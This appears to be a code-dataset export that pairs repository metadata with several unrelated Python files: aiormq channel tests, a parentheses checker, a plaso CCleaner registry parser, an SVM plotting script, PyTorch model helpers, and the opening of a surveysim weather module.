| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
138da1de200b7ec195fd8cfe7cb64a50fd1f3486
| 7,177
|
py
|
Python
|
tests/test_channel.py
|
rwilhelm/aiormq
|
9aa278e61d16ba18748f5f5a3fc76d0a273fd14a
|
[
"Apache-2.0"
] | 176
|
2019-01-13T13:41:43.000Z
|
2022-03-26T04:01:03.000Z
|
tests/test_channel.py
|
rwilhelm/aiormq
|
9aa278e61d16ba18748f5f5a3fc76d0a273fd14a
|
[
"Apache-2.0"
] | 79
|
2019-02-18T17:41:25.000Z
|
2022-02-25T11:09:33.000Z
|
tests/test_channel.py
|
rwilhelm/aiormq
|
9aa278e61d16ba18748f5f5a3fc76d0a273fd14a
|
[
"Apache-2.0"
] | 54
|
2019-02-19T09:53:12.000Z
|
2022-03-28T13:33:29.000Z
|
import asyncio
import uuid
import pytest
from aiomisc_pytest.pytest_plugin import TCPProxy
import aiormq
async def test_simple(amqp_channel: aiormq.Channel):
await amqp_channel.basic_qos(prefetch_count=1)
assert amqp_channel.number
queue = asyncio.Queue()
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
consume_ok = await amqp_channel.basic_consume(deaclare_ok.queue, queue.put)
await amqp_channel.basic_publish(
b"foo",
routing_key=deaclare_ok.queue,
properties=aiormq.spec.Basic.Properties(message_id="123"),
)
message = await queue.get() # type: DeliveredMessage
assert message.body == b"foo"
cancel_ok = await amqp_channel.basic_cancel(consume_ok.consumer_tag)
assert cancel_ok.consumer_tag == consume_ok.consumer_tag
assert cancel_ok.consumer_tag not in amqp_channel.consumers
await amqp_channel.queue_delete(deaclare_ok.queue)
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
await amqp_channel.basic_publish(b"foo bar", routing_key=deaclare_ok.queue)
message = await amqp_channel.basic_get(deaclare_ok.queue, no_ack=True)
assert message.body == b"foo bar"
async def test_blank_body(amqp_channel: aiormq.Channel):
await amqp_channel.basic_qos(prefetch_count=1)
assert amqp_channel.number
queue = asyncio.Queue()
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
consume_ok = await amqp_channel.basic_consume(deaclare_ok.queue, queue.put)
await amqp_channel.basic_publish(
b"",
routing_key=deaclare_ok.queue,
properties=aiormq.spec.Basic.Properties(message_id="123"),
)
message = await queue.get() # type: DeliveredMessage
assert message.body == b""
cancel_ok = await amqp_channel.basic_cancel(consume_ok.consumer_tag)
assert cancel_ok.consumer_tag == consume_ok.consumer_tag
assert cancel_ok.consumer_tag not in amqp_channel.consumers
await amqp_channel.queue_delete(deaclare_ok.queue)
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
await amqp_channel.basic_publish(b"foo bar", routing_key=deaclare_ok.queue)
message = await amqp_channel.basic_get(deaclare_ok.queue, no_ack=True)
assert message.body == b"foo bar"
@pytest.mark.no_catch_loop_exceptions
async def test_bad_consumer(amqp_channel: aiormq.Channel, loop):
channel = amqp_channel # type: aiormq.Channel
await channel.basic_qos(prefetch_count=1)
declare_ok = await channel.queue_declare()
future = loop.create_future()
await channel.basic_publish(b"urgent", routing_key=declare_ok.queue)
consumer_tag = loop.create_future()
async def bad_consumer(message):
await channel.basic_cancel(await consumer_tag)
future.set_result(message)
raise Exception
consume_ok = await channel.basic_consume(
declare_ok.queue, bad_consumer, no_ack=False,
)
consumer_tag.set_result(consume_ok.consumer_tag)
message = await future
await channel.basic_reject(message.delivery.delivery_tag, requeue=True)
assert message.body == b"urgent"
future = loop.create_future()
await channel.basic_consume(
declare_ok.queue, future.set_result, no_ack=True,
)
message = await future
assert message.body == b"urgent"
async def test_ack_nack_reject(amqp_channel: aiormq.Channel):
channel = amqp_channel # type: aiormq.Channel
await channel.basic_qos(prefetch_count=1)
declare_ok = await channel.queue_declare(auto_delete=True)
queue = asyncio.Queue()
await channel.basic_consume(declare_ok.queue, queue.put, no_ack=False)
await channel.basic_publish(b"rejected", routing_key=declare_ok.queue)
message = await queue.get()
assert message.body == b"rejected"
await channel.basic_reject(message.delivery.delivery_tag, requeue=False)
await channel.basic_publish(b"nacked", routing_key=declare_ok.queue)
message = await queue.get()
assert message.body == b"nacked"
await channel.basic_nack(message.delivery.delivery_tag, requeue=False)
await channel.basic_publish(b"acked", routing_key=declare_ok.queue)
message = await queue.get()
assert message.body == b"acked"
await channel.basic_ack(message.delivery.delivery_tag)
async def test_confirm_multiple(amqp_channel: aiormq.Channel):
"""
RabbitMQ has been observed to send confirmations in a strange pattern
when publishing simultaneously, where only some messages are delivered
to a queue. It sends acks like this: 1 2 4 5 (multiple, confirming also 3).
This test is probably inconsequential without publisher_confirms.
This is a regression test for https://github.com/mosquito/aiormq/issues/10
"""
channel = amqp_channel # type: aiormq.Channel
exchange = uuid.uuid4().hex
await channel.exchange_declare(exchange, exchange_type="topic")
try:
declare_ok = await channel.queue_declare(exclusive=True)
await channel.queue_bind(
declare_ok.queue, exchange, routing_key="test.5",
)
for i in range(10):
messages = [
asyncio.ensure_future(channel.basic_publish(
b"test", exchange=exchange, routing_key="test.{}".format(i),
))
for i in range(10)
]
_, pending = await asyncio.wait(messages, timeout=0.2)
assert not pending, "not all publishes were completed (confirmed)"
await asyncio.sleep(0.05)
finally:
await channel.exchange_delete(exchange)
async def test_exclusive_queue_locked(amqp_connection):
channel0 = await amqp_connection.channel()
channel1 = await amqp_connection.channel()
qname = str(uuid.uuid4())
await channel0.queue_declare(qname, exclusive=True)
try:
await channel0.basic_consume(qname, print, exclusive=True)
with pytest.raises(aiormq.exceptions.ChannelLockedResource):
await channel1.queue_declare(qname)
await channel1.basic_consume(qname, print, exclusive=True)
finally:
await channel0.queue_delete(qname)
async def test_remove_writer_when_closed(amqp_channel: aiormq.Channel):
with pytest.raises(aiormq.exceptions.ChannelClosed):
await amqp_channel.queue_declare(
"amq.forbidden_queue_name", auto_delete=True,
)
with pytest.raises(aiormq.exceptions.ChannelInvalidStateError):
await amqp_channel.queue_delete("amq.forbidden_queue_name")
async def test_proxy_connection(proxy_connection, proxy: TCPProxy):
channel = await proxy_connection.channel() # type: aiormq.Channel
await channel.queue_declare(auto_delete=True)
async def test_declare_queue_timeout(proxy_connection, proxy: TCPProxy):
for _ in range(3):
channel = await proxy_connection.channel() # type: aiormq.Channel
qname = str(uuid.uuid4())
with proxy.slowdown(read_delay=5, write_delay=0):
with pytest.raises(asyncio.TimeoutError):
await channel.queue_declare(
qname, auto_delete=True, timeout=0.5
)
| 34.671498
| 80
| 0.722029
| 937
| 7,177
| 5.297759
| 0.180363
| 0.073127
| 0.064464
| 0.050766
| 0.587429
| 0.53888
| 0.491338
| 0.445004
| 0.424456
| 0.408542
| 0
| 0.007229
| 0.19047
| 7,177
| 206
| 81
| 34.839806
| 0.84716
| 0.0209
| 0
| 0.401408
| 0
| 0
| 0.031631
| 0.00723
| 0
| 0
| 0
| 0
| 0.112676
| 1
| 0
| false
| 0
| 0.035211
| 0
| 0.035211
| 0.014085
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
138e485745a6d26b22140e7cd765e64928978552
| 455
|
py
|
Python
|
balanced_parens.py
|
joeghodsi/interview-questions
|
3e4eb76891245ce978cb9171e87d60e3b292b0a8
|
[
"Unlicense"
] | 1
|
2018-06-11T18:18:39.000Z
|
2018-06-11T18:18:39.000Z
|
balanced_parens.py
|
joeghodsi/interview-questions
|
3e4eb76891245ce978cb9171e87d60e3b292b0a8
|
[
"Unlicense"
] | null | null | null |
balanced_parens.py
|
joeghodsi/interview-questions
|
3e4eb76891245ce978cb9171e87d60e3b292b0a8
|
[
"Unlicense"
] | null | null | null |
'''
Problem description:
Given a string, determine whether or not the parentheses are balanced
'''
def balanced_parens(str):
'''
runtime: O(n)
space : O(1)
'''
if str is None:
return True
open_count = 0
for char in str:
if char == '(':
open_count += 1
elif char == ')':
open_count -= 1
if open_count < 0:
return False
return open_count == 0
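# Hypothetical spot checks (added for illustration; not part of the original
# file), showing the expected behavior of balanced_parens:
#
#     balanced_parens("(a(b)c)")  # -> True
#     balanced_parens("(()")      # -> False (unclosed paren)
#     balanced_parens(")(")       # -> False (close before any open)
#     balanced_parens(None)       # -> True  (treated as trivially balanced)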
| 17.5
| 69
| 0.514286
| 56
| 455
| 4.071429
| 0.607143
| 0.197368
| 0.131579
| 0.122807
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021429
| 0.384615
| 455
| 25
| 70
| 18.2
| 0.792857
| 0.259341
| 0
| 0
| 0
| 0
| 0.006452
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
138f08438e2c276d1577956212792c686c9d877c
| 6,333
|
py
|
Python
|
plaso/parsers/winreg_plugins/ccleaner.py
|
pyllyukko/plaso
|
7533db2d1035ca71d264d6281ebd5db2d073c587
|
[
"Apache-2.0"
] | 1,253
|
2015-01-02T13:58:02.000Z
|
2022-03-31T08:43:39.000Z
|
plaso/parsers/winreg_plugins/ccleaner.py
|
pyllyukko/plaso
|
7533db2d1035ca71d264d6281ebd5db2d073c587
|
[
"Apache-2.0"
] | 3,388
|
2015-01-02T11:17:58.000Z
|
2022-03-30T10:21:45.000Z
|
plaso/parsers/winreg_plugins/ccleaner.py
|
pyllyukko/plaso
|
7533db2d1035ca71d264d6281ebd5db2d073c587
|
[
"Apache-2.0"
] | 376
|
2015-01-20T07:04:54.000Z
|
2022-03-04T23:53:00.000Z
|
# -*- coding: utf-8 -*-
"""Parser for the CCleaner Registry key."""
import re
from dfdatetime import time_elements as dfdatetime_time_elements
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import definitions
from plaso.parsers import winreg_parser
from plaso.parsers.winreg_plugins import interface
class CCleanerConfigurationEventData(events.EventData):
"""CCleaner configuration event data.
Attributes:
configuration (str): CCleaner configuration.
key_path (str): Windows Registry key path.
"""
DATA_TYPE = 'ccleaner:configuration'
def __init__(self):
"""Initializes event data."""
super(CCleanerConfigurationEventData, self).__init__(
data_type=self.DATA_TYPE)
self.configuration = None
self.key_path = None
class CCleanerUpdateEventData(events.EventData):
"""CCleaner update event data.
Attributes:
key_path (str): Windows Registry key path.
"""
DATA_TYPE = 'ccleaner:update'
def __init__(self):
"""Initializes event data."""
super(CCleanerUpdateEventData, self).__init__(data_type=self.DATA_TYPE)
self.key_path = None
class CCleanerPlugin(interface.WindowsRegistryPlugin):
"""Gathers the CCleaner Keys for NTUSER hive.
Known Windows Registry values within the CCleaner key:
* (App)Cookies [REG_SZ], contains "True" if the cookies should be cleaned;
* (App)Delete Index.dat files [REG_SZ]
* (App)History [REG_SZ]
* (App)Last Download Location [REG_SZ]
* (App)Other Explorer MRUs [REG_SZ]
* (App)Recent Documents [REG_SZ]
* (App)Recently Typed URLs [REG_SZ]
* (App)Run (in Start Menu) [REG_SZ]
* (App)Temporary Internet Files [REG_SZ]
* (App)Thumbnail Cache [REG_SZ]
* CookiesToSave [REG_SZ]
* UpdateKey [REG_SZ], contains a date and time formatted as:
"MM/DD/YYYY hh:mm:ss [A|P]M", for example "07/13/2013 10:03:14 AM";
* WINDOW_HEIGHT [REG_SZ], contains the windows height in number of pixels;
* WINDOW_LEFT [REG_SZ]
* WINDOW_MAX [REG_SZ]
* WINDOW_TOP [REG_SZ]
* WINDOW_WIDTH [REG_SZ], contains the windows width in number of pixels;
Also see:
http://cheeky4n6monkey.blogspot.com/2012/02/writing-ccleaner-regripper-plugin-part_05.html
"""
NAME = 'ccleaner'
DATA_FORMAT = 'CCleaner Registry data'
FILTERS = frozenset([
interface.WindowsRegistryKeyPathFilter(
'HKEY_CURRENT_USER\\Software\\Piriform\\CCleaner')])
# Date and time string formatted as: "MM/DD/YYYY hh:mm:ss [A|P]M"
# for example "07/13/2013 10:03:14 AM"
# TODO: determine if this is true for other locales.
_UPDATE_DATE_TIME_RE = re.compile(
r'([0-9][0-9])/([0-9][0-9])/([0-9][0-9][0-9][0-9]) '
r'([0-9][0-9]):([0-9][0-9]):([0-9][0-9]) ([A|P]M)')
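# Illustrative note (added; not part of the original plaso source): for the
# sample string "07/13/2013 10:03:14 AM" the expression above yields the
# groups ('07', '13', '2013', '10', '03', '14', 'AM'), which
# _ParseUpdateKeyValue below converts to integers, adding 12 to the hour
# when the last group is 'PM'.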
def _ParseUpdateKeyValue(self, parser_mediator, registry_value):
"""Parses the UpdateKey value.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
registry_value (dfwinreg.WinRegistryValue): Windows Registry value.
Returns:
dfdatetime_time_elements.TimeElements: date and time value or None
if not available.
"""
if not registry_value.DataIsString():
parser_mediator.ProduceExtractionWarning(
'unsupported UpdateKey value data type: {0:s}'.format(
registry_value.data_type_string))
return None
date_time_string = registry_value.GetDataAsObject()
if not date_time_string:
parser_mediator.ProduceExtractionWarning('missing UpdateKey value data')
return None
re_match = self._UPDATE_DATE_TIME_RE.match(date_time_string)
if not re_match:
parser_mediator.ProduceExtractionWarning(
'unsupported UpdateKey value data: {0!s}'.format(date_time_string))
return None
month, day_of_month, year, hours, minutes, seconds, part_of_day = (
re_match.groups())
try:
year = int(year, 10)
month = int(month, 10)
day_of_month = int(day_of_month, 10)
hours = int(hours, 10)
minutes = int(minutes, 10)
seconds = int(seconds, 10)
except (TypeError, ValueError):
parser_mediator.ProduceExtractionWarning(
'invalid UpdateKey date time value: {0!s}'.format(date_time_string))
return None
if part_of_day == 'PM':
hours += 12
time_elements_tuple = (year, month, day_of_month, hours, minutes, seconds)
try:
date_time = dfdatetime_time_elements.TimeElements(
time_elements_tuple=time_elements_tuple)
date_time.is_local_time = True
except ValueError:
parser_mediator.ProduceExtractionWarning(
'invalid UpdateKey date time value: {0!s}'.format(
time_elements_tuple))
return None
return date_time
def ExtractEvents(self, parser_mediator, registry_key, **kwargs):
"""Extracts events from a Windows Registry key.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
registry_key (dfwinreg.WinRegistryKey): Windows Registry key.
"""
configuration = []
date_time = None
for registry_value in registry_key.GetValues():
if not registry_value.name or not registry_value.data:
continue
if registry_value.name == 'UpdateKey':
date_time = self._ParseUpdateKeyValue(parser_mediator, registry_value)
else:
value = registry_value.GetDataAsObject()
configuration.append('{0:s}: {1!s}'.format(registry_value.name, value))
if date_time:
event_data = CCleanerUpdateEventData()
event_data.key_path = registry_key.path
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_UPDATE,
time_zone=parser_mediator.timezone)
parser_mediator.ProduceEventWithEventData(event, event_data)
event_data = CCleanerConfigurationEventData()
event_data.configuration = ' '.join(sorted(configuration)) or None
event_data.key_path = registry_key.path
event = time_events.DateTimeValuesEvent(
registry_key.last_written_time, definitions.TIME_DESCRIPTION_WRITTEN)
parser_mediator.ProduceEventWithEventData(event, event_data)
winreg_parser.WinRegistryParser.RegisterPlugin(CCleanerPlugin)
| 33.331579
| 92
| 0.707879
| 794
| 6,333
| 5.437028
| 0.270781
| 0.01969
| 0.008339
| 0.011119
| 0.295112
| 0.276118
| 0.251564
| 0.203845
| 0.176048
| 0.176048
| 0
| 0.017015
| 0.192642
| 6,333
| 189
| 93
| 33.507937
| 0.827303
| 0.321017
| 0
| 0.223404
| 0
| 0.021277
| 0.102632
| 0.037431
| 0
| 0
| 0
| 0.005291
| 0
| 1
| 0.042553
| false
| 0
| 0.074468
| 0
| 0.276596
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1395c34c642a4ba06cd80eeb8c512c19499d8a1b
| 1,707
|
py
|
Python
|
mine/src/main/python/SVM.py
|
nextzlog/mine
|
49ef0bea4796920d8696dc5f076f86c0ab17be80
|
[
"BSD-3-Clause"
] | 3
|
2020-06-04T15:25:37.000Z
|
2020-06-06T05:09:07.000Z
|
mine/src/main/python/SVM.py
|
nextzlog/mine
|
49ef0bea4796920d8696dc5f076f86c0ab17be80
|
[
"BSD-3-Clause"
] | null | null | null |
mine/src/main/python/SVM.py
|
nextzlog/mine
|
49ef0bea4796920d8696dc5f076f86c0ab17be80
|
[
"BSD-3-Clause"
] | null | null | null |
import os,sys
import webbrowser
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.cm as cm
import matplotlib.pylab as plt
from matplotlib import ticker
plt.rcParams['font.family'] = 'monospace'
fig = plt.figure()
rect = fig.add_subplot(111, aspect='equal')
data0 = np.loadtxt('data0.dat', delimiter=',')
data1 = np.loadtxt('data1.dat', delimiter=',')
dense = np.loadtxt('dense.dat', delimiter=',')
ID = sys.argv[1]
X = np.arange(-2.0, 2.05, 0.05)
Y = np.arange(-2.0, 2.05, 0.05)
Xm, Ym = np.meshgrid(X, Y)
vmin, vmax = dense.min(), dense.max()
if vmin * vmax < 0:
vmin = -abs(max(-vmin, vmax))
vmax = +abs(max(-vmin, vmax))
cr = rect.imshow(dense.reshape((len(Y), len(X))), extent=(X[0], X[-1], Y[0], Y[-1]), vmin=vmin, vmax=vmax, cmap=cm.coolwarm, origin='lower')
plt.contour(Xm, Ym, dense, levels=[-1, 1], cmap=cm.bwr, linestyles='dashed', linewidths=[2,2])
plt.contour(Xm, Ym, dense, levels=[0], colors='black', linestyles='dashed', linewidths=[2])
cb = plt.colorbar(cr, format='%+.1e')
cb.solids.set_edgecolor('face')
cb.set_ticks(ticker.LinearLocator(6))
cb.ax.tick_params(labelsize=12)
rect.scatter(data0[:,0], data0[:,1], marker='v', facecolor='red', edgecolor='black', s=30, lw=1)
rect.scatter(data1[:,0], data1[:,1], marker='^', facecolor='blue', edgecolor='black', s=30, lw=1)
plt.xlim(X[0], X[-1])
plt.ylim(Y[0], Y[-1])
plt.xlabel("")
plt.ylabel("")
plt.grid(ls='dotted')
plt.savefig('{}.svg'.format(ID), bbox_inches='tight', pad_inches=0.1)
plt.savefig('{}.eps'.format(ID), bbox_inches='tight', pad_inches=0.1)
os.remove('dense.dat')
os.remove('data0.dat')
os.remove('data1.dat')
webbrowser.open('file://{}'.format(os.path.realpath('{}.svg'.format(sys.argv[1]))))
| 38.795455
| 140
| 0.671353
| 287
| 1,707
| 3.965157
| 0.390244
| 0.035149
| 0.01406
| 0.017575
| 0.16696
| 0.16696
| 0.087873
| 0.087873
| 0.059754
| 0
| 0
| 0.041131
| 0.088459
| 1,707
| 43
| 141
| 39.697674
| 0.690231
| 0
| 0
| 0
| 0
| 0
| 0.104277
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13980d70f605aa90e6f0d5a0697ef90a4b646aec
| 4,708
|
py
|
Python
|
task_templates/pipelines/python3_pytorch_regression/model_utils.py
|
andreakropp/datarobot-user-models
|
423ab8c703a545491ad6013a0b7efa3119e2c0fc
|
[
"Apache-2.0"
] | null | null | null |
task_templates/pipelines/python3_pytorch_regression/model_utils.py
|
andreakropp/datarobot-user-models
|
423ab8c703a545491ad6013a0b7efa3119e2c0fc
|
[
"Apache-2.0"
] | 9
|
2021-11-10T20:16:41.000Z
|
2022-03-12T00:59:05.000Z
|
task_templates/pipelines/python3_pytorch_regression/model_utils.py
|
andreakropp/datarobot-user-models
|
423ab8c703a545491ad6013a0b7efa3119e2c0fc
|
[
"Apache-2.0"
] | 1
|
2021-06-17T22:05:33.000Z
|
2021-06-17T22:05:33.000Z
|
#!/usr/bin/env python
# coding: utf-8
# pylint: disable-all
from __future__ import absolute_import
from sklearn.preprocessing import LabelEncoder
from pathlib import Path
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.optim as optim
class BinModel(nn.Module):
expected_target_type = torch.FloatTensor
def __init__(self, input_size):
super(BinModel, self).__init__()
self.fc1 = nn.Linear(input_size, 50)
self.relu1 = nn.ReLU()
self.dout = nn.Dropout(0.2)
self.fc2 = nn.Linear(50, 100)
self.prelu = nn.PReLU(1)
self.out = nn.Linear(100, 1)
self.out_act = nn.Sigmoid()
def forward(self, input_):
a1 = self.fc1(input_)
h1 = self.relu1(a1)
dout = self.dout(h1)
a2 = self.fc2(dout)
h2 = self.prelu(a2)
a3 = self.out(h2)
y = self.out_act(a3)
return y
class RegModel(nn.Module):
def __init__(self, input_size):
super(RegModel, self).__init__()
self.fc1 = nn.Linear(input_size, 50)
self.relu1 = nn.ReLU()
self.dout = nn.Dropout(0.2)
self.fc2 = nn.Linear(50, 100)
self.prelu = nn.PReLU(1)
self.out = nn.Linear(100, 1)
def forward(self, input_):
a1 = self.fc1(input_)
h1 = self.relu1(a1)
dout = self.dout(h1)
a2 = self.fc2(dout)
h2 = self.prelu(a2)
y = self.out(h2)
return y
class MultiModel(nn.Module):
expected_target_type = torch.LongTensor
def __init__(self, input_size, output_size):
super(MultiModel, self).__init__()
self.layer1 = nn.Linear(input_size, 8)
self.relu = nn.ReLU()
self.layer2 = nn.Linear(8, output_size)
self.out = nn.Softmax(dim=1)
def forward(self, input_):
out = self.layer1(input_)
out = self.relu(out)
out = self.layer2(out)
out = self.out(out)
return out
def train_epoch(model, opt, criterion, X, y, batch_size=50):
model.train()
losses = []
for beg_i in range(0, X.size(0), batch_size):
x_batch = X[beg_i : beg_i + batch_size, :]
# y_hat will be (batch_size, 1) dim, so coerce target to look the same
y_batch = y[beg_i : beg_i + batch_size].reshape(-1, 1)
x_batch = Variable(x_batch)
y_batch = Variable(y_batch)
opt.zero_grad()
# (1) Forward
y_hat = model(x_batch)
# (2) Compute diff
loss = criterion(y_hat, y_batch)
# (3) Compute gradients
loss.backward()
# (4) update weights
opt.step()
losses.append(loss.data.numpy())
return losses
def build_classifier(X, num_labels):
class_model = BinModel(X.shape[1]) if num_labels == 2 else MultiModel(X.shape[1], num_labels)
class_opt = optim.Adam(class_model.parameters(), lr=0.001)
class_criterion = nn.BCELoss() if num_labels == 2 else nn.CrossEntropyLoss()
return class_model, class_opt, class_criterion
def build_regressor(X):
reg_model = RegModel(X.shape[1])
reg_opt = optim.Adam(reg_model.parameters(), lr=0.001)
reg_criterion = nn.MSELoss()
return reg_model, reg_opt, reg_criterion
def train_classifier(X, y, class_model, class_opt, class_criterion, n_epochs=5):
target_encoder = LabelEncoder()
target_encoder.fit(y)
transformed_y = target_encoder.transform(y)
bin_t_X = torch.from_numpy(X.values).type(torch.FloatTensor)
bin_t_y = torch.from_numpy(transformed_y).type(class_model.expected_target_type)
for e in range(n_epochs):
train_epoch(class_model, class_opt, class_criterion, bin_t_X, bin_t_y)
def train_regressor(X, y, reg_model, reg_opt, reg_criterion, n_epochs=5):
reg_t_X = torch.from_numpy(X.values).type(torch.FloatTensor)
reg_t_y = torch.from_numpy(y.values).type(torch.FloatTensor)
for e in range(n_epochs):
train_epoch(reg_model, reg_opt, reg_criterion, reg_t_X, reg_t_y)
def save_torch_model(model, output_dir_path, filename="torch_bin.pth"):
output_file_path = Path(output_dir_path) / filename
torch.save(model, output_file_path)
def subset_data(X):
numerics = ["int16", "int32", "int64", "float16", "float32", "float64"]
# exclude any completely-missing columns when checking for numerics
num_features = list(X.dropna(axis=1, how="all").select_dtypes(include=numerics).columns)
# keep numeric features, zero-impute any missing values
# obviously this is a very rudimentary approach to handling missing values
# a more sophisticated imputer can be implemented by making use of custom transform, load, and predict hooks
return X[num_features].fillna(0)
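# Usage sketch: a minimal, hedged example of wiring these helpers together; the
# synthetic DataFrame and target below are assumptions made purely for demonstration.
if __name__ == "__main__":
    import numpy as np
    import pandas as pd

    X_df = pd.DataFrame(np.random.rand(200, 4), columns=list("abcd"))
    y = pd.Series(np.random.rand(200))

    X_num = subset_data(X_df)  # keep numeric columns, zero-impute missing values
    reg_model, reg_opt, reg_criterion = build_regressor(X_num)
    train_regressor(X_num, y, reg_model, reg_opt, reg_criterion, n_epochs=2)
    save_torch_model(reg_model, ".", filename="torch_reg.pth")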
| 31.810811
| 112
| 0.656542
| 693
| 4,708
| 4.236652
| 0.271284
| 0.021798
| 0.027248
| 0.016349
| 0.361035
| 0.300409
| 0.191417
| 0.191417
| 0.172343
| 0.172343
| 0
| 0.028934
| 0.229184
| 4,708
| 147
| 113
| 32.027211
| 0.780105
| 0.104715
| 0
| 0.300971
| 0
| 0
| 0.012372
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.126214
| false
| 0
| 0.067961
| 0
| 0.31068
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13984baeb601966ec125e0ffbdce4b6e8815be83
| 9,894
|
py
|
Python
|
py/surveysim/weather.py
|
mlandriau/surveysim
|
e7a323d6c4031b1b8df25e776dbe81188fbe8860
|
[
"BSD-3-Clause"
] | null | null | null |
py/surveysim/weather.py
|
mlandriau/surveysim
|
e7a323d6c4031b1b8df25e776dbe81188fbe8860
|
[
"BSD-3-Clause"
] | 55
|
2016-11-14T21:58:11.000Z
|
2021-03-16T01:07:31.000Z
|
py/surveysim/weather.py
|
mlandriau/surveysim
|
e7a323d6c4031b1b8df25e776dbe81188fbe8860
|
[
"BSD-3-Clause"
] | 4
|
2016-11-19T00:17:02.000Z
|
2021-02-24T14:38:46.000Z
|
"""Simulate stochastic observing weather conditions.
The simulated conditions include seeing, transparency and the dome-open fraction.
"""
from __future__ import print_function, division, absolute_import
from datetime import datetime
import numpy as np
import astropy.time
import astropy.table
import astropy.units as u
import desiutil.log
import desimodel.weather
import desisurvey.config
import desisurvey.ephem
import desisurvey.utils
class Weather(object):
"""Simulate weather conditions affecting observations.
The start/stop date range is taken from the survey config.
Seeing and transparency values are stored with 32-bit floats to save
some memory.
Parameters
----------
seed : int
Random number seed to use to generate stochastic conditions.
The seed determines the same seeing and transparency realization
independent of the value of ``replay``.
replay : str
Either 'random' or a comma-separated list of years whose
historical weather should be replayed, e.g. 'Y2010,Y2012'.
Replayed weather will be used cyclically if necessary.
Random weather will be a bootstrap sampling of all available
years with historical weather data. Use 'Y2015' for the
worst-case weather scenario.
time_step : float or :class:`astropy.units.Quantity`, optional
Time step used for calculating updates. Must evenly divide 24 hours.
If unitless float, will be interpreted as minutes.
restore : filename or None
Restore an existing weather simulation from the specified file name.
All other parameters are ignored when this is provided. A relative path
name refers to the :meth:`configuration output path
<desisurvey.config.Configuration.get_path>`.
extra_downtime : float
Additionally close the dome completely on some nights. Nights are
chosen randomly, with the chance of a night being closed equal to
``extra_downtime``. This is intended to include margin.
"""
def __init__(self, seed=1, replay='random', time_step=5, restore=None,
extra_downtime=0):
if not isinstance(time_step, u.Quantity):
time_step = time_step * u.min
self.log = desiutil.log.get_logger()
config = desisurvey.config.Configuration()
ephem = desisurvey.ephem.get_ephem()
if restore is not None:
fullname = config.get_path(restore)
self._table = astropy.table.Table.read(fullname)
self.start_date = desisurvey.utils.get_date(
self._table.meta['START'])
self.stop_date = desisurvey.utils.get_date(
self._table.meta['STOP'])
self.num_nights = self._table.meta['NIGHTS']
self.steps_per_day = self._table.meta['STEPS']
self.replay = self._table.meta['REPLAY']
self.log.info('Restored weather from {}.'.format(fullname))
return
else:
self.log.info('Generating random weather with seed={} replay="{}".'
.format(seed, replay))
gen = np.random.RandomState(seed)
# Use our config to set any unspecified dates.
start_date = config.first_day()
stop_date = config.last_day()
num_nights = (stop_date - start_date).days
if num_nights <= 0:
raise ValueError('Expected start_date < stop_date.')
# Check that the time step evenly divides 24 hours.
steps_per_day = int(round((1 * u.day / time_step).to(1).value))
if not np.allclose((steps_per_day * time_step).to(u.day).value, 1.):
raise ValueError(
'Requested time_step does not evenly divide 24 hours: {0}.'
.format(time_step))
# Calculate the number of times where we will tabulate the weather.
num_rows = num_nights * steps_per_day
meta = dict(START=str(start_date), STOP=str(stop_date),
NIGHTS=num_nights, STEPS=steps_per_day, REPLAY=replay)
self._table = astropy.table.Table(meta=meta)
# Initialize column of MJD timestamps.
t0 = desisurvey.utils.local_noon_on_date(start_date)
times = t0 + (np.arange(num_rows) / float(steps_per_day)) * u.day
self._table['mjd'] = times.mjd
# Generate a random atmospheric seeing time series.
dt_sec = 24 * 3600. / steps_per_day
self._table['seeing'] = desimodel.weather.sample_seeing(
num_rows, dt_sec=dt_sec, gen=gen).astype(np.float32)
